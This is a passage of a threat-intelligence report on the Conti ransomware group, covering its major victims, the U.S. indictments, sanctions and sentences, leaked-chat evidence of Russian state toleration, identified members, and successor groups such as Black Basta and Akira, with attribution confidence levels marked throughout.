| Ireland HSE (Health Service Executive) | May 2021 | Near-complete shutdown of national health IT; cancer screenings and appointments canceled; 80%+ encryption | Cost estimated >$600M to remediate. Conti provided free decryptor after government refusal to pay $20M demand, but threatened data publication. First access: March 18, 2021 via malicious Excel attachment. Eight weeks of dwell time before detonation. [12][23] |
| Government of Costa Rica | Apr–May 2022 | ~30 government institutions including Ministry of Finance; national state of emergency declared | First cyberattack to trigger a national emergency declaration globally. $20M demand; government refused. Used as cover for Conti brand dissolution. [14][42] |
| Broward County Public Schools | Mar 2021 | School district encrypted; $40M ransom demand; threat to release student data | Notable for targeting of minors' educational records as leverage |
| Scripps Health (California) | May 2021 | Major California health system; patient care disrupted | Specific DOJ indictment filed against Maksim Galochkin for this attack [16] |
| Advantech | Nov 2020 | Industrial IoT manufacturer; 3 GB of data stolen | Early high-profile Conti DLS posting [24] |
| City of Tulsa | May 2021 | Government network compromise | Named in BleepingComputer reporting [24] |
On September 7, 2023, the DOJ unsealed three federal indictments across three jurisdictions, charging nine Russian nationals:
| Jurisdiction | Charges | Max Penalty | Named Defendants |
|---|---|---|---|
| N.D. Ohio (TrickBot conspiracy) | Conspiracy to violate CFAA; wire fraud conspiracy; money laundering conspiracy | 62 years | Galochkin, Rudenskiy, Tsarev, Zhuykov, Putilin, Loguntsov, Mikhaylov, Karyagin, Khaliullin |
| M.D. Tennessee (Conti conspiracy) | Conspiring to use Conti ransomware against U.S. targets 2020–Jun 2022 | 25 years | Galochkin, Rudenskiy, Tsarev, Zhuykov |
| S.D. California (Scripps Health) | Specific attack on Scripps Health May 1, 2021; impaired medical care | 20 years | Maksim Galochkin specifically |
All named defendants remain at large in Russia as of May 2026. [16]
| Individual | Role | Action | Outcome |
|---|---|---|---|
| Alla Witte | TrickBot programmer (Latvian national) | Arrested 2021; charged | Pleaded guilty to conspiracy to commit computer fraud; sentenced to 32 months, June 2023 |
| Vladimir Dunaev | TrickBot developer (Russian national) | Extradited from South Korea to the U.S. (N.D. Ohio) in 2021 | Pleaded guilty November 2023 to conspiracy charges; sentenced to 64 months, March 2024 |
| Deniss Zolotarjovs | Conti-linked organization (Latvian, based Moscow); operated under Conti, Karakurt, Royal, TommyLeaks, SchoolBoys, Akira brands | Arrested in Georgia Dec 2023; extradited to U.S. | Pleaded guilty July 2025 to conspiracy to commit money laundering and wire fraud; sentenced to 102 months May 2026. First major custodial sentence in Conti network. [6][47] |
The U.S. OFAC and UK FCDO simultaneously sanctioned 11 Russian nationals connected to Conti and TrickBot: Andrey Zhuykov, Maksim Galochkin, Maksim Rudenskiy, Mikhail Tsarev, Dmitry Putilin, Maksim Khaliullin, Sergey Loguntsov, Vadym Valiakhmetov, Artem Kurov, Mikhail Chernov, and Alexander Mozhaev. Sanctions prohibit financial transactions and enable asset seizure by U.S. and UK governments. [17]
- May 2021: FBI alert specifically warning healthcare sector; 16 attacks on healthcare/first responder networks documented
- September 2021: Joint CISA/FBI/NSA advisory documenting 400+ attacks, TTPs, and mitigations
- May 2022: State Department Rewards for Justice: up to $10M for Conti leadership identification/location; up to $5M for arrest/conviction
- August 2022: Rewards for Justice expanded: five specific operators named; photograph of "Target" released publicly
- May 2025: BKA Germany names Vitaly Kovalev as Conti/TrickBot founder; Interpol Red Notice issued
The leaked Jabber logs contain the most direct documentation of Conti's communication with Russian law enforcement available in open-source reporting. In October 2021, Conti member "Kagas" wrote to Stern:
"Our old case was resumed... The Americans officially requested information about Russian hackers... Next Tuesday, the investigator called us for a conversation, but for now, it's like [we're being called on as] witnesses. That way if the case is suspended, they can't interrogate us in any way."
Conti member "Kagas" to Stern, October 2021 (leaked chat log)
A separate Conti member immediately reported that the group's contacts had assured it the Russian-side investigation would go nowhere and would be closed by mid-November 2021. This same period saw Russian investigators appearing more interested in pursuing REvil members than Conti, culminating in the January 2022 FSB arrests of REvil, which many analysts assessed as a political gesture timed to the Ukraine buildup. The leaked chats also reference Liteyny Avenue in Saint Petersburg, home to FSB offices, in a context suggesting external contact with a helpful government-adjacent source. [10][22]
| Vendor | Assessment | Date |
|---|---|---|
| Mandiant | "At least a portion of actors involved with CONTI ransomware are based in Russia and some criminals operating from there already have documented ties with Russian intelligence apparatus. More recently, publicly reported chat logs suggest that a key player in CONTI operations may have intended to provide support for government projects." | Feb 2022 |
| U.S. Department of State | Explicitly labeled Conti a "Russian government-linked ransomware-as-a-service (RaaS) group" in August 2022 Rewards for Justice announcement. Strongest public U.S. government characterization; falls short of confirming formal intelligence relationship. | Aug 2022 |
| Recorded Future (Dark Covenant 3.0) | Documents ongoing pattern of Russian government tolerance for cybercriminal activity in exchange for geopolitical utility; Conti cited as defining case study in protected criminal enterprise model. | Oct 2025 |
The available evidence supports a moderate-to-high confidence assessment of implicit state toleration. Conti received advance warning from Russian investigators, operated openly in Russia without prosecution, and consistently avoided CIS targets across 1,000+ documented attacks. The leaked chats document direct back-channel communication between Conti leadership and Russian law enforcement. A formal, active intelligence-sharing or tasking relationship cannot be confirmed from public evidence. The operational distinction is likely: Conti's ransomware attacks generated hard currency and geopolitical leverage that served Russian state interests without requiring formal direction. The protected criminal enterprise model eliminates the state's deniability costs while preserving its operational benefits.
The reference to Liteyny Avenue (FSB headquarters street) in leaked communications, combined with the demonstrated advance warning of law enforcement inquiries, is consistent with an active FSB liaison relationship rather than passive tolerance. This remains analyst inference; the chats establish contact but not formal tasking. [10][48]
| Alias | Real Name | Age | Nationality | Role | Source |
|---|---|---|---|---|---|
| Stern / Ben / Demon | Vitaly Nikolaevich Kovalev | 36 | Russian | Founder/CEO of TrickBot and Conti; supreme leader | BKA Germany; GangExposed 2025 [25][19] |
| Professor | Vladimir Viktorovich Kvitko | 39 | Russian (Dubai) | Senior general; offshore operations; Dubai hub | GangExposed 2025; US RFJ bounty [26][18] |
| Mango | Mikhail Mikhailovich Tsaryov | N/A | Russian | Mid-level manager; day-to-day operations | DOJ indictment 2023; GangExposed [16][18] |
| Defender | Andrey Yuryevich Zhuykov | N/A | Russian | Lead systems administrator | DOJ indictment; UK NCA sanction [16][17] |
| Bentley | Maksim Galochkin | N/A | Russian | Crypter / obfuscation; indicted in three jurisdictions | DOJ indictment [16] |
| Buza | Maksim Rudenskiy | N/A | Russian | Developer supervisor | DOJ indictment [16] |
| Target | Unidentified | N/A | Assessed Russian | Senior leader; luxury assets (Ferrari, Maybach) | US RFJ $10M bounty; photo released Aug 2022 [27] |
The Conti collapse was an own-goal triggered by geopolitics. The group's public declaration of support for Russia's invasion of Ukraine was catastrophically ill-considered:
- It exposed the group's Russian identity and state alignment to affiliates who had operational security reasons to maintain deniability
- It triggered the Ukrainian insider who had penetrated Conti's infrastructure to act, releasing the most comprehensive criminal organization leak in cybercrime history
- It made the Conti brand a liability for victims: paying Conti created sanctions violation exposure under OFAC
- It caused direct internal fracture along national and ethnic lines, with Ukrainian members becoming adversaries
AdvIntel's Boguslavskiy and Kremez concluded: "The Conti brand, not the organization itself, is shutting down." The Costa Rica attack served simultaneously as a final high-profile operation, cover for migrating members and infrastructure, and a capability demonstration to affiliates considering defection to competing groups. [15][14]
| Group | Relationship to Conti | Evidence Basis | Confidence |
|---|---|---|---|
| TrickBot | Absorbed by Conti; shared personnel and leadership | Chat logs; DOJ indictments confirm shared defendants | CONFIRMED |
| Ryuk | Technical and personnel predecessor | Code overlap; personnel (Professor's code comment); TRM Labs blockchain forensics | CONFIRMED |
| Emotet ("Booz") | Distribution partner and platform | Chat logs confirm deep integration; Emotet had 50+ coders referenced | CONFIRMED |
| BazarLoader/BazarBackdoor | Distribution vehicle replacing TrickBot | CISA advisory; security research | CONFIRMED |
Court-Confirmed Cluster: The DOJ's May 2026 sentencing of Deniss Zolotarjovs provides court-confirmed documentation of the Conti cluster model. His organization used ransom note brands including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, confirming these were overlapping operational identities used by the same core actor network, not independent organizations. [6][47]
| Group | Relationship | Status (May 2026) | Key Evidence | Confidence |
|---|---|---|---|---|
| Black Basta | Conti offshoot; emerged April 2022 | Defunct (Feb 2025, own chat leak) | Shared TTPs; Black Basta leaked chats confirmed former Conti actors; TRM Labs blockchain analysis | HIGH (Analyst1, TRM Labs) [49][50] |
| Karakurt | Conti side operation / extortion-only branch | Active (reduced) | Blockchain analysis: direct wallet connections to Conti; Arctic Wolf and Chainalysis corroboration; Zolotarjovs sentence confirms overlap [51] | HIGH |
| Royal / BlackSuit | Conti member continuation; assessed core Wizard Spider tier | Active as BlackSuit | BushidoToken threat intel; shared personnel and infrastructure indicators; FBI advisory confirms Conti connection [52] | MEDIUM-HIGH |
| Akira | Conti operator continuation; affiliate and mid-tier operator continuity | Active (2026) | Blockchain evidence (TRM Labs 2026); shared laundering infrastructure; Russian-language artifacts; US sanctions and Zolotarjovs sentence confirm Conti lineage [4][6] | HIGH |
| BlackByte | Conti spinoff | Active (reduced) | AdvIntel/Kremez assessment; infrastructure overlap [15] | MEDIUM |
| Diavol | Conti/TrickBot sub-operation | Largely dormant | Code and infrastructure analysis; Arctic Wolf [51] | MEDIUM-HIGH |
The February 2025 Black Basta internal chat leak followed the same pattern as the original Conti leak: an insider or disgruntled member published internal communications, directly contributing to the group's dissolution. The Conti diaspora appears condemned to repeat the cycle. The organizational model of a large, salaried, multi-ethnic workforce creates a structural insider-threat exposure that pure-affiliate models do not share, and each generation of Conti-lineage groups inherits both the operational playbook and this structural vulnerability.
- "Target" identity: Despite a $10M U.S. bounty and GangExposed's stated intent to identify him, Target's real name has not been publicly confirmed
- Full financial scope: Total cryptocurrency holdings and current wallet infrastructure of the Conti diaspora are partially mapped but not fully documented
- Formal state intelligence relationship: The exact nature of FSB involvement or passive tolerance remains an open question; leaked chats establish back-channel contact but not formal tasking
- GangExposed identity and motivation: Source's own identity, access method, and motivations remain unconfirmed; possibility that GangExposed is state-adjacent cannot be ruled out
- Akira/Royal operational leadership: Actor overlap assessed with high confidence; full attribution of current operational leadership to specific former Conti individuals is incomplete in public reporting